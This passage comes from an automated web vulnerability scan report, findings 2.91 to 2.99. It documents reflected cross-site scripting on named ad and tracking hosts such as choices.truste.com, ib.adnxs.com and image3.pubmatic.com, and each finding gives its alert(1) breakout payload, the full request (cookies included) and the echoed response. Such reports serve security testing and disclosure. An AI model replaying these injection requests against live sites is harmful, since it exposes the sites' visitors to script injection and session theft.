Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:19 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':201e2fc<script>alert(1)</script>485c4866fa1,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','notice
...[SNIP]...
2.91. http://choices.truste.com/ca [plc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload 3dfbb<script>alert(1)</script>3f1c606171d was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=10002&plc=tr3dfbb<script>alert(1)</script>3f1c606171d&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:20 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':20,'oy':0,'plc':'tr3dfbb<script>alert(1)</script>3f1c606171d','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','noticeBaseUrl':'http://
...[SNIP]...
2.92. http://choices.truste.com/ca [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the w request parameter is copied into the HTML document as plain text between tags. The payload 5c2d2<script>alert(1)</script>33523cd489b was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=3005c2d2<script>alert(1)</script>33523cd489b&h=250&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:19 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4122

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':3005c2d2<script>alert(1)</script>33523cd489b,'height':250,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId'
...[SNIP]...
2.93. http://choices.truste.com/ca [zi parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload 5710e<script>alert(1)</script>ce869b4fe74 was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=100025710e<script>alert(1)</script>ce869b4fe74&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:19 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
overlay(te_clr1_att02cont1_bi)','icon':'http://choices.truste.com/assets/admarker.png','icon_cam':'http://choices.truste.com/assets/adicon.png','iconText':'','aid':'att02','pid':'mec01','zindex':'100025710e<script>alert(1)</script>ce869b4fe74','cam':'2'};

   var tecabaseurl = 'choices.truste.com';

   truste.ca.addEvent(window, 'load', function() {
       if(!truste.defjsload) {
           var element = document.createElement('script');
           element.src = '
...[SNIP]...
2.94. http://cm.npc-scripps.overture.com/js_1_0/ [css_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cm.npc-scripps.overture.com
Path:   /js_1_0/

Issue detail

The value of the css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8330"><script>alert(1)</script>c20de1645a8 was submitted in the css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js_1_0/?config=7894763060&type=entertainment&ctxtId=entertainment&keywordCharEnc=utf8&source=npc_scripps_courierpress_t1_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.courierpress.com%2Fnews%2F2011%2Fmay%2F12%2Fheder-here-in-this-spp-ppppp%2F&css_url=http://media.scrippsnewspapers.com/yahoo/yahoo_cm.cssb8330"><script>alert(1)</script>c20de1645a8&du=1&cb=1305207046691&ctxtContent=%3C!--%0A%20%20%0A%20%20%20%20%0A%20%20%20%20ROLE%20%3D%20prod.%0A--%3E%3Chead%3E%0A%09%0A%09%09%0A%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%09%09%09var%20jSINGconf%20%3D%20%7B%7D%3B%0A%09%09%09jSINGconf.theme%20%3D%20%7B%0A%09%09%09%09%0A%09%09%09%09%09CITY%3A%20'Evansville'%2C%0A%09%09%09%09%0A%09%09%09%09%09SITE_NAME%3A%20'Evansville%20Courier%20%26%20Press'%2C%0A%09%09%09%09%0A%09%09%09%09%09VIDEO_MEDIA_URL%3A%20'http%3A%2F%2Fmedia.scrippsnewspapers.com%2Fcorp_assets%2Fasphalt'%2C%0A%09%09%09%09%0A%09%09%09%09%09SITE_MEDIA_URL%3A%20'http%3A%2F%2Fweb.courierpress.com%2Fstatic%2Fecp%2Fasphalt%2Fprod'%2C%0A%09%09%09%09%0A%09%09%09%09%09REGION%3A%20'Evansville'%2C%0A%09%09%09%09%0A%09%09%09%09%09MOBILE_SITE_NAME%3A%20'Evansville%20Courier%20%26%20Press%20Mobile'%2C%0A%09%09%09%09%0A%09%09%09%09%09SITE_URL%3A%20'http%3A%2F%2Fwww HTTP/1.1
Host: cm.npc-scripps.overture.com
Proxy-Connection: keep-alive
Referer: http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=76of9et6r747t&b=3&s=m1; UserData=02u3hs9yoaLQsFTjBpdnM0tDCyNTUycXAzcLJTNk%2bLSi4sTU1JNbEBACNDFzcLUwNnC2MAc2BU%2bQw=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:10 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpdnM0tDCyNTUycXAzcLJTNk%2bLSi4sTU1JNbEBACNDVzczExMLS3MAN0tUBA0=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Sun, 09-May-2021 13:32:10 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4470


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_top">
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<link rel="stylesheet" href="http://media.scrippsnewspapers.com/yahoo/yahoo_cm.cssb8330"><script>alert(1)</script>c20de1645a8" type="text/css">
...[SNIP]...
2.95. http://guidepolls.about.com/urbanlegends/8140502316/poll.js [linkback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://guidepolls.about.com
Path:   /urbanlegends/8140502316/poll.js

Issue detail

The value of the linkback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e7d1'%3balert(1)//b1ec805f36c was submitted in the linkback parameter. This input was echoed as 6e7d1';alert(1)//b1ec805f36c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /urbanlegends/8140502316/poll.js?linkback=http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm6e7d1'%3balert(1)//b1ec805f36c HTTP/1.1
Host: guidepolls.about.com
Proxy-Connection: keep-alive
Referer: http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMog=B5312m3f20kA052n; zFD=B5310B50110B00101; jsc=13; Mint=B5CDUi2520kA1h03; zBT=1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:24 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.25_01 ARM/06TD.34
PRAGMA: no-cache
Cache-Control: max-age=-3600
Expires: Thu, 12 May 2011 12:32:24 GMT
Content-Type: application/x-javascript
Content-Length: 907

var x = '<div class="poll"> <h4>Are you superstitious about Friday the 13th?</h4> <form method="get" action="/gi/pages/poll.htm"> <input type="hidden" name="linkback" value="http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm6e7d1';alert(1)//b1ec805f36c">
...[SNIP]...
2.96. http://hits.nextstat.com/cgi-bin/wsv2.cgi [108645 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.nextstat.com
Path:   /cgi-bin/wsv2.cgi

Issue detail

The value of the 108645 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8db3"-alert(1)-"d35a77103d0 was submitted in the 108645 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi-bin/wsv2.cgi?108645d8db3"-alert(1)-"d35a77103d0 HTTP/1.1
Host: hits.nextstat.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: private
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: webStat_108645d8db3"-alert(1)-"d35a77103d0=2b45ebce6d4c259189182ba86a7560e8; expires=Sun, 09-May-2021 13:32:27 GMT; path=/; domain=.nextstat.com
Set-Cookie: webStat_108645d8db3"-alert(1)-"d35a77103d0_mv=2b45ebce6d4c259189182ba86a7560e8; expires=Sun, 09-May-2021 13:32:27 GMT; path=/; domain=.nextstat.com
Content-Length: 4124
Connection: close
Content-Type: text/html; charset=UTF-8

function wf_get_rfsqv() {
var q = (WS_rfs_3p && WS_ref.indexOf('?') > 0)?WS_ref.substring(WS_ref.indexOf('?')+1):WS_rfs.location.search.substring(1),v = q.split("&");
for (var i=0;i<v.length;i++)
...[SNIP]...
}
return true;
}
function wf_rfs_get() { if (! WS_rfs) { WS_rfs = WS_w; WS_rfs = wf_rfs_main (WS_rfs); } return WS_rfs; }
function wf_evt_trk(et){var i=new Image();i.src=et;}

var WS_ac="108645d8db3"-alert(1)-"d35a77103d0";
var WS_w=window, WS_d=document, WS_rfs = 0, WS_rfs_3p = 0, WS_ref = WS_d.referrer;

var WS_aref;
var WS_pn;
var WS_pnj = "";
var WS_Cam, WS_Evt;
if (WS_pn) WS_pn = escape(WS_pn);
else if (WS_pnj) WS
...[SNIP]...
2.97. http://ib.adnxs.com/ptj [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab71b'%3balert(1)//4d87f937d49 was submitted in the redir parameter. This input was echoed as ab71b';alert(1)//4d87f937d49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=541&size=300x250&inv_code=1588565&referrer=http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250%26section%3D1588565ab71b'%3balert(1)//4d87f937d49 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://adserving2.cpxinteractive.com/st?ad_type=iframe&ad_size=300x250&section=1588565
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIn4MBEAoYAiACKAIwsMeq7gQKEgibiwEQChgDIAMoAzDcyKruBAoSCN--AhAKGAEgASgBMOHequ4EEOHequ4EGBQ.; anj=Kfw)(H.Ook)_c8%r9ff]S@h8KANc]mP0h#i:1kZfDLeOJ8#%:'=tMdp)hT=FiVaam_7'jPTW.C%.HxVrFU+@):Ol/][9rD6QF]:$2o$=2t6Ekuw9KB7t>8oBvD:k99t)AUvBQXpMrB.WZ5q$]?qZQ<Vu[#-5^T/x)S7Oq?h<uC6Z'cFlMBT^$(tZTqQER-Qb:5W?g#97-6xWK*4C*9Y>i-@J(yrw^Ur004(6av#+:`V.$%Pg]1DL-tn5$I':[WH#s(nOG69jVj#uUqQEFm_f3-WbrQnxP_drdf#rnuCaB*1I[+NvK[h(c^5Cfj.]G5(':2LiI%%e8#U`X)iJ[4k+(rXIJhdni<)gQjgMUOcN^MOw573KS9ffE$yoAk:>vBb/x@'DVx72K/G/TF_NOLJt[Iy>s!G$dq2Xo:NAZ$7JjL5hQ1Wl:w0(Oa@MM`A:J5wBQuG9jejGeOsVqM1%Tv8OvW0d`NSP4F`8%4q]@s=N3tj7_2rE.]F]824R1O]-r7%W#2%YUAe0vv=@J-XlNPR`5^cw-2hGuDpvfqe=s6vBS!qVDC)at^+-@uA6Zcf)LUf'Vu<UUwffAv@PD(x%bOXCT7ce=h0.JV^-rud6M/nMD2uDe+h%f9jmNXTMyW!I=tuJLUZJ#YJ4>1u!>#NuZ#?6t96[:wU5#1KSrBf*SZTK8<Ta<L772@gT_5e9PMtHS(PR0#:aQJ9n`5j; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-ooBEAoYASABKAEwmMOv7gQQmMOv7gQYAA..; path=/; expires=Wed, 10-Aug-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb949612=-@L6D208WMq5cpg20/dRjHaWJ?enc=PDw8PDw8DEAAAAAAAAAIQAAAAAAAAAhAYhBYObQIEUAK16NwPQoUQIPTcXV8EH5bSsYda6b2ziWY4ctNAAAAABRWAwAdAgAA4gEAAAIAAAAPCAQAksAAAAEAAABVU0QAVVNEACwB-gAkAwAAlBABAgUCAAUAAAAA9Rdv9wAAAAA.&tt_code=1588565&udj=uf%28%27a%27%2C+12656%2C+1305207192%29%3Buf%28%27c%27%2C+60150%2C+1305207192%29%3Buf%28%27r%27%2C+264207%2C+1305207192%29%3B&cnd=!SRusDwj21QMQj5AQGAAgkoEDMAA4pAZAAEjiA1CUrA1YAGDaAWgAcAB4AIABFogB5hWQAQGYAQGgAQOoAQOwAQG5AQrXo3A9ChRAwQEK16NwPQoUQMkBMzMzMzMz9z_QAQA.&ccd=!ZARnJwj21QMQj5AQGJKBAyAA; path=/; expires=Fri, 13-May-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(Hg0)m)_Uh2u:[r@PdBuy]S=FdXg)Ov(hO!$dY(koMBFV9m*6?J@gS%S=?Gc6U#?^ITW.C%.HqtOE7nUz/H)+lj:jQe>d]P0JIz6scC@6!d^_JDL4(Eqn@KB?p+IxXVz5l@7Qi.hvK2fXWC#z.Yve]0:@BovHT9i=Y6*`[@LEqZ4a_oFLsJ<T2#7YqwU:X?m8t!O'_[X`Em/W+C?b_[^-Hx_81HGl6h7e_55C!4`6(QHuL*7*hlVs@B8ctXnwcD41w%TF7tcaN'7gZRdos7`wWAw9W-/ha4br%YE`t(l[/BJwTSaS-Nc$C/A^$uCbte)*hR*amnJS-cCjw3iTW/B=7Q2<r31W:r>.KSS4M$.yv.GqtpO[l>P]h*gT8<W#j9g0LMgA6.-4#4od>anYU0Wc@oKg0/KerE_.4wFT5'v'CW/OPy(fr>m7SgdTLkIyRODhZB3z%P+OOlsW7dd*7qUVrjq-92umvYr#K3b?)VOKosPd+%D)jULIwnE@[^9b3Cl()!Qw4.XR-[318NFl+`e[!Ky_NNk5-hr9S^JfE-gj1.#r!>v/lWxG'1N+lNL5nZyr!ks@v2c(!cJBEI>62Gw1*pL.k/6UF4vEX.85uk2hUy7c/Jq<`Lk(BKmr99HS5dP1q_rJ7n?ZTTpx%5Xu^KG7qKbG[w'F@'iqnKm0B!8R)Z]LhY<SIqwwOVGrk[Yo; path=/; expires=Wed, 10-Aug-2011 13:33:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 13:33:12 GMT
Content-Length: 296

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/st?anmember=541&anprice=300&ad_type=ad&ad_size=300x250&section=1588565ab71b';alert(1)//4d87f937d49"></scr'+'ipt>');docu
...[SNIP]...
2.98. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e56f'-alert(1)-'49e155643b was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/UPug?operId=2&pubId=398&pixId=6&ran=0.19279520929519856&pageURL=http://www.pubmatic.com/2e56f'-alert(1)-'49e155643b HTTP/1.1
Host: image3.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:3658195966029417970; PUBRETARGET=82_1399045295.806_1336140548; KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:18 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KADUSERCOOKIE=0927D9EA-1CD0-46F5-B72D-6FC4476FCBD6; domain=pubmatic.com; expires=Fri, 11-May-2012 13:34:18 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: text/html
Content-Length: 500

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/398/6/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="true"
...[SNIP]...
olling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://ptrack.pubmatic.com/AdServer/PugTracker?pixId=6&pubId=398&ran=0.19279520929519856&pageURL=http://www.pubmatic.com/2e56f'-alert(1)-'49e155643b">
...[SNIP]...
2.99. http://image3.pubmatic.com/AdServer/UPug [ran parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The value of the ran request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33c57'-alert(1)-'f87ac0b58b4 was submitted in the ran parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/UPug?operId=2&pubId=398&pixId=6&ran=0.1927952092951985633c57'-alert(1)-'f87ac0b58b4&pageURL=http://www.pubmatic.com/ HTTP/1.1
Host: image3.pubmatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:3658195966029417970; PUBRETARGET=82_1399045295.806_1336140548; KRTBCOOKIE_148=1699-uid:E3F32BD09546C94DAD95D1B540110C

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:18 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KADUSERCOOKIE=7AFF6AED-C8A2-4BD1-85B4-05A0945C43F9; domain=pubmatic.com; expires=Fri, 11-May-2012 13:34:18 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: text/html
Content-Length: 501

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/398/6/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="true"
...[SNIP]...
